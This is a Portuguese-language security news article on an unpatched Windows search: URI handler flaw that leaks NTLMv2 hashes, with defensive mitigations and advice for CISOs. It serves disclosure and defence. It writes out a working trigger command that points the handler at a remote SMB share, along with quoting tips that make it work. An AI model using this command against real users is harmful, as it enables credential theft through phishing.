Uma falha recém-divulgada no manipulador de URI de pesquisa do Windows pode vazar silenciosamente hashes NTLMv2 para servidores controlados por atacantes com apenas um clique em um link. Este comportamento é a mesma classe de bug que CVE-2026-33829 na Ferramenta de Captura, mas a Microsoft não atribuiu nenhum CVE e não enviou nenhuma correção para esta variante.
Em 14 de abril de 2026, a Microsoft corrigiu o CVE-2026-33829, uma questão de vazamento de credenciais NTLM no manipulador de URI ms-screensketch da Ferramenta de Captura. Esse bug permitia que atacantes fornecessem um parâmetro filePath apontando para um caminho UNC remoto, acionando autenticação SMB de saída e expondo o hash Net-NTLMv2 da vítima.
Mecanismo da falha e vetor de ataque
A Huntress descobriu que a mesma primitiva existe no manipulador de URI de pesquisa do Windows, usando crumb=location em vez de filePath, mas produzindo o mesmo vazamento de Net-NTLMv2 para um endpoint SMB do atacante. Um usuário poderia ser enganado ao clicar em um link que parecia normal, e sua máquina tentaria automaticamente verificar em um servidor SMB do atacante.
O bug foi reproduzido no Windows 11 25H2 Pro (Build 26200.8524) sob uma conta de usuário padrão com configurações padrão do Defender e sem configuração especial de desenvolvedor ou AppX. A partir de um prompt de comando, o seguinte é suficiente para acionar o vazamento: start "" "search:query=test&crumb=location:\10.0.1.100\share".
O aspas e o wrapper start "" importam; sem eles, o cmd analisa o caractere & como um separador de comando, e a carga útil parece "quebrar". Quando acionado corretamente, o Windows mostra um diálogo de erro de "acesso negado", mas apenas depois que o hash NTLMv2 já foi enviado ao servidor remoto.
Implicações para a governança de identidade
Apenas a primeira invocação por logon vaza o hash; tentativas subsequentes retornam acesso negado até que o usuário faça logoff e logon novamente. Para phishing, esse primeiro clique é tudo que um atacante precisa. Sob o capô, tanto search quanto search-ms são registrados separadamente em HKCR, mas compartilham a mesma linha de comando e CLSID DelegateExecute, {90b9bce2-b6db-4fd3-8451-35917ea1081b}, que mapeia para a classe COM SearchExecute (CLSID_SearchMSExecute) no ExplorerFrame.dll.
Isso significa que ambos os esquemas de URI efetivamente atingem o mesmo caminho de ativação COM, e qualquer validação de entrada ausente na SearchExecute afeta ambos igualmente. Uma correção real precisa chegar na SearchExecute ou no manuseio de pesquisa do Explorer, não apenas no nível de registro de URI.
Por que a Microsoft não corrigiu?
Ainda assim, a Microsoft escolheu corrigir e atribuir um CVE para a Ferramenta de Captura, enquanto fechou o caso de pesquisa como "abaixo da barra de serviço" e descreveu explicitamente o serviço como exceção-driven e "caso a caso". CVE-2026-33829 e a questão de pesquisa descoberta pela Huntress compartilham a mesma classe de vulnerabilidade (vazamento de NTLM via manipulador de URI), o mesmo vetor CVSS efetivo (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) e a mesma classificação de severidade Moderada.
Medidas de mitigação recomendadas
A Huntress recomenda bloquear SMB de saída (TCP 445 e 139) de hosts que não precisam dele como a mitigação de maior valor único para toda essa classe de vazamento de NTLM. Aplicar assinatura SMB, restringir ou desabilitar NTLM (por exemplo, definindo RestrictSendingNTLMTraffic para 2 após auditoria cuidadosa) e alertar sobre URIs search: e search-ms: em logs de e-mail e proxy pode reduzir significativamente a exposição a toda essa classe de vazamento de NTLM.
O que os CISOs devem fazer agora
Os administradores de segurança devem revisar as políticas de firewall para bloquear tráfego SMB de saída de estações de trabalho, exceto para servidores de arquivos autorizados. Implementar monitoramento de logs de proxy para detectar tentativas de conexão a servidores SMB externos. Considerar a desativação do NTLMv2 em ambientes onde o Kerberos é predominante. Auditar a atividade de autenticação no Active Directory para detectar tentativas de hash de NTLMv2.
Perguntas frequentes
Isso afeta todos os usuários do Windows? Sim, qualquer usuário que clique em um link malicioso pode ser afetado, independentemente das permissões administrativas.
Existe uma correção disponível? Não, a Microsoft classificou isso como abaixo da barra de serviço. A mitigação é baseada em configuração de rede e políticas de segurança.
Como detectar se fui afetado? Verifique os logs de segurança do Windows para eventos de autenticação SMB de saída e monitore tráfego de rede incomum na porta 445.